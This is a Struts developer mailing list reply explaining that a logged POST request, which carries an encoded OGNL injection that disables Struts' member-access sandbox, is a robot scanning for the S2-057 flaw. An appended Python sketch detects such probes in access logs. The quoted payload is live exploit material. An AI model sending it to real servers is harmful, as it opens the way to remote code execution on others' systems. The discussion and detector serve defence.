struts-dev mailing list archives

From Lukasz Lenart <lukaszlen...@apache.org>
Subject Re: Not seen this attempt before?
Date Sun, 20 Jan 2019 14:33:37 GMT
On Sun, 20 Jan 2019 at 13:02, Greg Huber <gregh3269@gmail.com> wrote:
>
> Any ideas?
>
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
> /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
> HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action HTTP/1.1"
> 200 2023 "-" "Auto Spider 1.0"

I would say a robot is scanning the Internet to find vulnerable sites, and
it looks like it addresses the latest vulnerability with namespace
evaluation
https://cwiki.apache.org/confluence/display/WW/S2-057


Regards
-- 
Łukasz
+ 48 606 323 122 http://www.lenart.org.pl/
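
A defensive triage sketch for probes like the one quoted above, added here as an example and not part of the original message or of Struts: it percent-decodes the request path of each access-log line and flags OGNL expression markers found in it. The log lines, addresses and user agent are constructed samples, and the marker list is an assumption rather than an exhaustive signature.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Assumed markers of an OGNL expression sitting in the URL path.
OGNL_MARKERS = {
    "expression delimiter": re.compile(r'[%$]\{'),
    "member access override": re.compile(r'#_memberAccess'),
    "static member reference": re.compile(r'@[\w.]+@\w+'),
}

def decode_fully(value, max_rounds=3):
    """Percent-decode until stable so double-encoded paths are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return a finding dict for a suspicious log line, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    path = decode_fully(m["target"].split("?", 1)[0])  # path only, not query
    markers = [name for name, rx in OGNL_MARKERS.items() if rx.search(path)]
    if not markers:
        return None
    # Status is kept so a responder can see how the server answered the probe.
    return {"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "agent": m["ua"], "path": path, "markers": markers}

def scan(lines):
    return [f for f in map(scan_line, lines) if f]

SAMPLE_LOG = [  # constructed lines in the same format as the quoted log
    '192.0.2.10 - - [18/Jan/2019:18:13:32 +0000] "POST /%25%7b(%23a%3d1)%7d/index.action HTTP/1.1" 500 1497 "-" "Example Scanner"',
    '192.0.2.10 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action HTTP/1.1" 200 2023 "-" "Example Scanner"',
    '198.51.100.7 - - [18/Jan/2019:18:14:02 +0000] "GET /%2525%257b(%2523a%253d1)%257d/list.action HTTP/1.1" 404 512 "-" "Example Scanner"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```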
